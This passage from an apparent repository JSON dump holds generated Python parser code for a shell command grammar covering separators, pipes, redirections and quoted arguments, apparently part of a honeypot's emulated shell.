super(TreeNode9, self).__init__(text, offset, elements)\n        self.sep = elements[3]\n        self.cmd = elements[2]\n\n\nclass TreeNode10(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode10, self).__init__(text, offset, elements)\n        self.arg = elements[0]\n\n\nclass TreeNode11(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode11, self).__init__(text, offset, elements)\n        self.arg = elements[1]\n\n\nclass ParseError(SyntaxError):\n    pass\n\n\nFAILURE = object()\n\n\nclass Grammar(object):\n    REGEX_1 = re.compile('^[^\\']')\n    REGEX_2 = re.compile('^[^\"]')\n    REGEX_3 = re.compile('^[^ ;|&()\"\\'><]')\n\n    def _read_cmd(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmd'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_cmdlist()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_empty()\n            if address0 is FAILURE:\n                self._offset = index1\n        self._cache['cmd'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdlist(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdlist'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_cmdsingle()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            index2 = self._offset\n            index3, elements1 = self._offset, []\n            address3 = FAILURE\n            address3 = self._read_sep()\n            if address3 is not FAILURE:\n                elements1.append(address3)\n                address4 = FAILURE\n           
     index4 = self._offset\n                chunk0 = None\n                if self._offset < self._input_size:\n                    chunk0 = self._input[self._offset:self._offset + 1]\n                if chunk0 == ';':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\";\"')\n                if address4 is FAILURE:\n                    self._offset = index4\n                    chunk1 = None\n                    if self._offset < self._input_size:\n                        chunk1 = self._input[self._offset:self._offset + 1]\n                    if chunk1 == '&':\n                        address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                        self._offset = self._offset + 1\n                    else:\n                        address4 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\"&\"')\n                    if address4 is FAILURE:\n                        self._offset = index4\n                if address4 is not FAILURE:\n                    elements1.append(address4)\n                    address5 = FAILURE\n                    address5 = self._read_sep()\n                    if address5 is not FAILURE:\n                        elements1.append(address5)\n                        address6 = FAILURE\n                        address6 = self._read_cmdlist()\n                  
      if address6 is not FAILURE:\n                            elements1.append(address6)\n                        else:\n                            elements1 = None\n                            self._offset = index3\n                    else:\n                        elements1 = None\n                        self._offset = index3\n                else:\n                    elements1 = None\n                    self._offset = index3\n            else:\n                elements1 = None\n                self._offset = index3\n            if elements1 is None:\n                address2 = FAILURE\n            else:\n                address2 = TreeNode2(self._input[index3:self._offset], index3, elements1)\n                self._offset = self._offset\n            if address2 is FAILURE:\n                address2 = TreeNode(self._input[index2:index2], index2)\n                self._offset = index2\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_list(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdlist'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdsingle(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdsingle'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_cmdpipe()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            index2 = self._offset\n            index3, elements1 = self._offset, 
[]\n            address3 = FAILURE\n            address3 = self._read_sep()\n            if address3 is not FAILURE:\n                elements1.append(address3)\n                address4 = FAILURE\n                index4 = self._offset\n                chunk0 = None\n                if self._offset < self._input_size:\n                    chunk0 = self._input[self._offset:self._offset + 2]\n                if chunk0 == '||':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                    self._offset = self._offset + 2\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\"||\"')\n                if address4 is FAILURE:\n                    self._offset = index4\n                    chunk1 = None\n                    if self._offset < self._input_size:\n                        chunk1 = self._input[self._offset:self._offset + 2]\n                    if chunk1 == '&&':\n                        address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                        self._offset = self._offset + 2\n                    else:\n                        address4 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\"&&\"')\n                    if address4 is FAILURE:\n                        self._offset = index4\n                if address4 is not FAILURE:\n                    elements1.append(address4)\n                    address5 = FAILURE\n                    address5 = self._read_sep()\n       
             if address5 is not FAILURE:\n                        elements1.append(address5)\n                        address6 = FAILURE\n                        address6 = self._read_cmdsingle()\n                        if address6 is not FAILURE:\n                            elements1.append(address6)\n                        else:\n                            elements1 = None\n                            self._offset = index3\n                    else:\n                        elements1 = None\n                        self._offset = index3\n                else:\n                    elements1 = None\n                    self._offset = index3\n            else:\n                elements1 = None\n                self._offset = index3\n            if elements1 is None:\n                address2 = FAILURE\n            else:\n                address2 = TreeNode4(self._input[index3:self._offset], index3, elements1)\n                self._offset = self._offset\n            if address2 is FAILURE:\n                address2 = TreeNode(self._input[index2:index2], index2)\n                self._offset = index2\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_single(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdsingle'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdpipe(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdpipe'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        
address1 = self._read_cmdredir()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            index2 = self._offset\n            index3, elements1 = self._offset, []\n            address3 = FAILURE\n            address3 = self._read_sep()\n            if address3 is not FAILURE:\n                elements1.append(address3)\n                address4 = FAILURE\n                index4, elements2 = self._offset, []\n                address5 = FAILURE\n                chunk0 = None\n                if self._offset < self._input_size:\n                    chunk0 = self._input[self._offset:self._offset + 1]\n                if chunk0 == '|':\n                    address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address5 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\"|\"')\n                if address5 is not FAILURE:\n                    elements2.append(address5)\n                    address6 = FAILURE\n                    index5 = self._offset\n                    chunk1 = None\n                    if self._offset < self._input_size:\n                        chunk1 = self._input[self._offset:self._offset + 1]\n                    if chunk1 == '|':\n                        address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                        self._offset = self._offset + 1\n                    else:\n                        address6 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if 
self._offset == self._failure:\n                            self._expected.append('\"|\"')\n                    self._offset = index5\n                    if address6 is FAILURE:\n                        address6 = TreeNode(self._input[self._offset:self._offset], self._offset)\n                        self._offset = self._offset\n                    else:\n                        address6 = FAILURE\n                    if address6 is not FAILURE:\n                        elements2.append(address6)\n                    else:\n                        elements2 = None\n                        self._offset = index4\n                else:\n                    elements2 = None\n                    self._offset = index4\n                if elements2 is None:\n                    address4 = FAILURE\n                else:\n                    address4 = TreeNode(self._input[index4:self._offset], index4, elements2)\n                    self._offset = self._offset\n                if address4 is not FAILURE:\n                    elements1.append(address4)\n                    address7 = FAILURE\n                    address7 = self._read_sep()\n                    if address7 is not FAILURE:\n                        elements1.append(address7)\n                        address8 = FAILURE\n                        address8 = self._read_cmdpipe()\n                        if address8 is not FAILURE:\n                            elements1.append(address8)\n                        else:\n                            elements1 = None\n                            self._offset = index3\n                    else:\n                        elements1 = None\n                        self._offset = index3\n                else:\n                    elements1 = None\n                    self._offset = index3\n            else:\n                elements1 = None\n                self._offset = index3\n            if elements1 is None:\n                address2 = FAILURE\n            else:\n        
        address2 = TreeNode6(self._input[index3:self._offset], index3, elements1)\n                self._offset = self._offset\n            if address2 is FAILURE:\n                address2 = TreeNode(self._input[index2:index2], index2)\n                self._offset = index2\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_pipe(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdpipe'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdredir(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdredir'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_cmdargs()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                index3, elements2 = self._offset, []\n                address4 = FAILURE\n                address4 = self._read_sep()\n                if address4 is not FAILURE:\n                    elements2.append(address4)\n                    address5 = FAILURE\n                    index4 = self._offset\n                    chunk0 = None\n                    if self._offset < self._input_size:\n                        chunk0 = self._input[self._offset:self._offset + 3]\n                    if chunk0 == '>>-':\n                        address5 = 
TreeNode(self._input[self._offset:self._offset + 3], self._offset)\n                        self._offset = self._offset + 3\n                    else:\n                        address5 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\">>-\"')\n                    if address5 is FAILURE:\n                        self._offset = index4\n                        chunk1 = None\n                        if self._offset < self._input_size:\n                            chunk1 = self._input[self._offset:self._offset + 2]\n                        if chunk1 == '>>':\n                            address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                            self._offset = self._offset + 2\n                        else:\n                            address5 = FAILURE\n                            if self._offset > self._failure:\n                                self._failure = self._offset\n                                self._expected = []\n                            if self._offset == self._failure:\n                                self._expected.append('\">>\"')\n                        if address5 is FAILURE:\n                            self._offset = index4\n                            chunk2 = None\n                            if self._offset < self._input_size:\n                                chunk2 = self._input[self._offset:self._offset + 2]\n                            if chunk2 == '<<':\n                                address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                self._offset = self._offset + 2\n                            else:\n                                address5 = FAILURE\n                                if 
self._offset > self._failure:\n                                    self._failure = self._offset\n                                    self._expected = []\n                                if self._offset == self._failure:\n                                    self._expected.append('\"<<\"')\n                            if address5 is FAILURE:\n                                self._offset = index4\n                                chunk3 = None\n                                if self._offset < self._input_size:\n                                    chunk3 = self._input[self._offset:self._offset + 2]\n                                if chunk3 == '<>':\n                                    address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                    self._offset = self._offset + 2\n                                else:\n                                    address5 = FAILURE\n                                    if self._offset > self._failure:\n                                        self._failure = self._offset\n                                        self._expected = []\n                                    if self._offset == self._failure:\n                                        self._expected.append('\"<>\"')\n                                if address5 is FAILURE:\n                                    self._offset = index4\n                                    chunk4 = None\n                                    if self._offset < self._input_size:\n                                        chunk4 = self._input[self._offset:self._offset + 2]\n                                    if chunk4 == '<&':\n                                        address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                        self._offset = self._offset + 2\n                                    else:\n                                        address5 = FAILURE\n                                     
   if self._offset > self._failure:\n                                            self._failure = self._offset\n                                            self._expected = []\n                                        if self._offset == self._failure:\n                                            self._expected.append('\"<&\"')\n                                    if address5 is FAILURE:\n                                        self._offset = index4\n                                        chunk5 = None\n                                        if self._offset < self._input_size:\n                                            chunk5 = self._input[self._offset:self._offset + 2]\n                                        if chunk5 == '>&':\n                                            address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                            self._offset = self._offset + 2\n                                        else:\n                                            address5 = FAILURE\n                                            if self._offset > self._failure:\n                                                self._failure = self._offset\n                                                self._expected = []\n                                            if self._offset == self._failure:\n                                                self._expected.append('\">&\"')\n                                        if address5 is FAILURE:\n                                            self._offset = index4\n                                            chunk6 = None\n                                            if self._offset < self._input_size:\n                                                chunk6 = self._input[self._offset:self._offset + 1]\n                                            if chunk6 == '<':\n                                                address5 = TreeNode(self._input[self._offset:self._offset + 1], 
self._offset)\n                                                self._offset = self._offset + 1\n                                            else:\n                                                address5 = FAILURE\n                                                if self._offset > self._failure:\n                                                    self._failure = self._offset\n                                                    self._expected = []\n                                                if self._offset == self._failure:\n                                                    self._expected.append('\"<\"')\n                                            if address5 is FAILURE:\n                                                self._offset = index4\n                                                chunk7 = None\n                                                if self._offset < self._input_size:\n                                                    chunk7 = self._input[self._offset:self._offset + 1]\n                                                if chunk7 == '>':\n                                                    address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                                                    self._offset = self._offset + 1\n                                                else:\n                                                    address5 = FAILURE\n                                                    if self._offset > self._failure:\n                                                        self._failure = self._offset\n                                                        self._expected = []\n                                                    if self._offset == self._failure:\n                                                        self._expected.append('\">\"')\n                                                if address5 is FAILURE:\n                                                    self._offset = index4\n      
              if address5 is not FAILURE:\n                        elements2.append(address5)\n                        address6 = FAILURE\n                        address6 = self._read_sep()\n                        if address6 is not FAILURE:\n                            elements2.append(address6)\n                            address7 = FAILURE\n                            address7 = self._read_arg()\n                            if address7 is not FAILURE:\n                                elements2.append(address7)\n                            else:\n                                elements2 = None\n                                self._offset = index3\n                        else:\n                            elements2 = None\n                            self._offset = index3\n                    else:\n                        elements2 = None\n                        self._offset = index3\n                else:\n                    elements2 = None\n                    self._offset = index3\n                if elements2 is None:\n                    address3 = FAILURE\n                else:\n                    address3 = TreeNode8(self._input[index3:self._offset], index3, elements2)\n                    self._offset = self._offset\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = 
self._actions.make_redir(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdredir'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdargs(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdargs'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_cmdbrac()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_args()\n            if address0 is FAILURE:\n                self._offset = index1\n        self._cache['cmdargs'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdbrac(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdbrac'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 1]\n        if chunk0 == '(':\n            address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n            self._offset = self._offset + 1\n        else:\n            address1 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                self._expected.append('\"(\"')\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            address2 = self._read_sep()\n            if address2 is not FAILURE:\n                elements0.append(address2)\n                address3 = FAILURE\n                address3 = self._read_cmd()\n                if address3 is not 
FAILURE:\n                    elements0.append(address3)\n                    address4 = FAILURE\n                    address4 = self._read_sep()\n                    if address4 is not FAILURE:\n                        elements0.append(address4)\n                        address5 = FAILURE\n                        chunk1 = None\n                        if self._offset < self._input_size:\n                            chunk1 = self._input[self._offset:self._offset + 1]\n                        if chunk1 == ')':\n                            address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                            self._offset = self._offset + 1\n                        else:\n                            address5 = FAILURE\n                            if self._offset > self._failure:\n                                self._failure = self._offset\n                                self._expected = []\n                            if self._offset == self._failure:\n                                self._expected.append('\")\"')\n                        if address5 is not FAILURE:\n                            elements0.append(address5)\n                        else:\n                            elements0 = None\n                            self._offset = index1\n                    else:\n                        elements0 = None\n                        self._offset = index1\n                else:\n                    elements0 = None\n                    self._offset = index1\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_cmdbrac(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdbrac'][index0] = (address0, self._offset)\n        return 
address0\n\n    def _read_args(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['args'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_arg()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                index3, elements2 = self._offset, []\n                address4 = FAILURE\n                remaining1, index4, elements3, address5 = 1, self._offset, [], True\n                while address5 is not FAILURE:\n                    chunk0 = None\n                    if self._offset < self._input_size:\n                        chunk0 = self._input[self._offset:self._offset + 1]\n                    if chunk0 == ' ':\n                        address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                        self._offset = self._offset + 1\n                    else:\n                        address5 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\" \"')\n                    if address5 is not FAILURE:\n                        elements3.append(address5)\n                        remaining1 -= 1\n                if remaining1 <= 0:\n                    address4 = TreeNode(self._input[index4:self._offset], index4, elements3)\n                    self._offset = self._offset\n                else:\n                    address4 = FAILURE\n                if address4 is not FAILURE:\n                    elements2.append(address4)\n    
                address6 = FAILURE\n                    address6 = self._read_arg()\n                    if address6 is not FAILURE:\n                        elements2.append(address6)\n                    else:\n                        elements2 = None\n                        self._offset = index3\n                else:\n                    elements2 = None\n                    self._offset = index3\n                if elements2 is None:\n                    address3 = FAILURE\n                else:\n                    address3 = TreeNode11(self._input[index3:self._offset], index3, elements2)\n                    self._offset = self._offset\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_args(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['args'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_arg_quot1()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_arg_quot2()\n            if address0 is 
FAILURE:\n                self._offset = index1\n                address0 = self._read_arg_noquot()\n                if address0 is FAILURE:\n                    self._offset = index1\n                    address0 = self._read_empty()\n                    if address0 is FAILURE:\n                        self._offset = index1\n        self._cache['arg'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_noempty(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_noempty'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_arg_quot1()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_arg_quot2()\n            if address0 is FAILURE:\n                self._offset = index1\n                address0 = self._read_arg_noquot()\n                if address0 is FAILURE:\n                    self._offset = index1\n        self._cache['arg_noempty'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_quot1(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_quot1'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 1]\n        if chunk0 == '\\'':\n            address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n            self._offset = self._offset + 1\n        else:\n            address1 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                
self._expected.append('\"\\'\"')\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                chunk1 = None\n                if self._offset < self._input_size:\n                    chunk1 = self._input[self._offset:self._offset + 1]\n                if chunk1 is not None and Grammar.REGEX_1.search(chunk1):\n                    address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address3 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('[^\\']')\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n                address4 = FAILURE\n                chunk2 = None\n                if self._offset < self._input_size:\n                    chunk2 = self._input[self._offset:self._offset + 1]\n                if chunk2 == '\\'':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        
self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\"\\'\"')\n                if address4 is not FAILURE:\n                    elements0.append(address4)\n                else:\n                    elements0 = None\n                    self._offset = index1\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['arg_quot1'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_quot2(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_quot2'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 1]\n        if chunk0 == '\"':\n            address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n            self._offset = self._offset + 1\n        else:\n            address1 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                self._expected.append('\\'\"\\'')\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                chunk1 = None\n                if self._offset < 
self._input_size:\n                    chunk1 = self._input[self._offset:self._offset + 1]\n                if chunk1 is not None and Grammar.REGEX_2.search(chunk1):\n                    address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address3 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('[^\"]')\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n                address4 = FAILURE\n                chunk2 = None\n                if self._offset < self._input_size:\n                    chunk2 = self._input[self._offset:self._offset + 1]\n                if chunk2 == '\"':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\\'\"\\'')\n                if address4 is not FAILURE:\n                    elements0.append(address4)\n                else:\n                    elements0 = None\n                    self._offset = index1\n        
    else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['arg_quot2'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_noquot(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_noquot'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        remaining0, index1, elements0, address1 = 1, self._offset, [], True\n        while address1 is not FAILURE:\n            chunk0 = None\n            if self._offset < self._input_size:\n                chunk0 = self._input[self._offset:self._offset + 1]\n            if chunk0 is not None and Grammar.REGEX_3.search(chunk0):\n                address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                self._offset = self._offset + 1\n            else:\n                address1 = FAILURE\n                if self._offset > self._failure:\n                    self._failure = self._offset\n                    self._expected = []\n                if self._offset == self._failure:\n                    self._expected.append('[^ ;|&()\"\\'><]')\n            if address1 is not FAILURE:\n                elements0.append(address1)\n                remaining0 -= 1\n        if remaining0 <= 0:\n            address0 = self._actions.make_arg_noquot(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        else:\n            address0 = FAILURE\n        self._cache['arg_noquot'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_empty(self):\n        address0, index0 = FAILURE, 
self._offset\n        cached = self._cache['empty'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 0]\n        if chunk0 == '':\n            address0 = TreeNode(self._input[self._offset:self._offset + 0], self._offset)\n            self._offset = self._offset + 0\n        else:\n            address0 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                self._expected.append('\"\"')\n        if address0 is FAILURE:\n            address0 = TreeNode(self._input[index1:index1], index1)\n            self._offset = index1\n        self._cache['empty'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_sep(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['sep'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        remaining0, index1, elements0, address1 = 0, self._offset, [], True\n        while address1 is not FAILURE:\n            chunk0 = None\n            if self._offset < self._input_size:\n                chunk0 = self._input[self._offset:self._offset + 1]\n            if chunk0 == ' ':\n                address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                self._offset = self._offset + 1\n            else:\n                address1 = FAILURE\n                if self._offset > self._failure:\n                    self._failure = self._offset\n                    self._expected = []\n                if self._offset == self._failure:\n                    self._expected.append('\" \"')\n            if address1 is not FAILURE:\n                
elements0.append(address1)\n                remaining0 -= 1\n        if remaining0 <= 0:\n            address0 = TreeNode(self._input[index1:self._offset], index1, elements0)\n            self._offset = self._offset\n        else:\n            address0 = FAILURE\n        self._cache['sep'][index0] = (address0, self._offset)\n        return address0\n\n\nclass Parser(Grammar):\n    def __init__(self, input, actions, types):\n        self._input = input\n        self._input_size = len(input)\n        self._actions = actions\n        self._types = types\n        self._offset = 0\n        self._cache = defaultdict(dict)\n        self._failure = 0\n        self._expected = []\n\n    def parse(self):\n        tree = self._read_cmd()\n        if tree is not FAILURE and self._offset == self._input_size:\n            return tree\n        if not self._expected:\n            self._failure = self._offset\n            self._expected.append('<EOF>')\n        raise ParseError(format_error(self._input, self._failure, self._expected))\n\n\ndef format_error(input, offset, expected):\n    lines, line_no, position = input.split('\\n'), 0, 0\n    while position <= offset:\n        position += len(lines[line_no]) + 1\n        line_no += 1\n    message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\\n', lines[line_no - 1]\n    message += line + '\\n'\n    position -= len(line) + 1\n    message += ' ' * (offset - position)\n    return message + '^'\n\ndef parse(input, actions=None, types=None):\n    parser = Parser(input, actions, types)\n    return parser.parse()\n"
  },
  {
    "path": "honeypot/shell/shell.py",
